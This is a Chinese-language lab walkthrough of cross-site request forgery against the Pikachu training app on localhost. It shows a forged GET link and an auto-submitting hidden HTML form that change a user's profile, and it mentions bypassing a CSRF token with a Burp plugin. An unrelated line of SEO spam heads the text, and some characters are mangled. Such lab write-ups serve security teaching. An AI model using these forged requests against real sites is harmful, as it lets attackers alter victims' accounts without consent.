各大门户网站怎么做推广,网上注册公司要钱吗,网站介绍视频怎么做的,电子商务网站建设重要性CSRF:
介绍#xff1a;
Cross-site request forgery简称为CSRF”。
在CSF的攻击场景中攻击者会伪造一个请求#xff08;这个请求一般是一个链接#xff09;
然后欺骗目标用户进行点击#xff0c;用户一旦点击了这个请求#xff0c;整个攻击也就完成了#xff0…CSRF:
介绍
Cross-site request forgery简称为CSRF”。
在CSF的攻击场景中攻击者会伪造一个请求这个请求一般是一个链接
然后欺骗目标用户进行点击用户一旦点击了这个请求整个攻击也就完成了本题是修改个人信息。
所以CSRF攻击也被称为为one click攻击。
1.CSRF(get)
我们先登录lucy的账号点击修改信息顺便用bp抓个包。 成功抓到数据包看到get请求 GET /vul/csrf/csrfget/csrf_get_edit.php?sexgirlphonenum12345678922addbeijingemaillucy%40pikachu.comsubmitsubmit
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sexgirlphonenum12345678922addbeijingemaillucy%40pikachu.comsubmitsubmit
我们把性别改成男
http://127.0.0.1/pikachu//vul/csrf/csrfget/csrf_get_edit.php?sexboyphonenum12345678922addbeijingemaillucy%40pikachu.comsubmitsubmit
若lucy此时登录了该网站点击了我们构造的 url 就会修改个人信息。
这里也可以使用一些短链接的方式。lucy访问该网站即可修改信息。 2.CSRF(post):
这里依旧拿lucy的个人信息实验我们点击随便修改一下个人信息顺便bp抓包。
此时 lucy 信息 post传参的话需要我们自己创一个表单进行提交。
sexboyphonenum111111addbeijingemaillucy%40pikachu.comsubmitsubmit
--------------------
我们自己创一个html的文件放到服务器上
htmlscript !-- 这个script是用来自动提交表单的 --window.onload function() {document.getElementById(submit).click();}/script bodyform actionhttp://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php methodPOST input typehidden namesex valueboy /input typehidden namephonenum value111222 /input typehidden nameadd valuebeijing /input typehidden nameemail valuelucypikachu.com /input typehidden namesubmit valuesubmit /input idsubmit typesubmit valueSubmit request styledisplay:none/ !-- style设置为display:none起到隐藏submit按钮的作用 --/form/body
/html 利用phpstudy将文件路径放到pikachu目录下访问后修过成功。
http://127.0.0.1/pikachu/srf_post.php 3.CSRF Token:
这个时候我们可以利用 burp suite 的插件 CSRF Token Tracker 来绕过 此时lucy个人信息如下和抓包信息。 插件信息 修改数据包刷新lucy的个人信息即可发现数据被更改。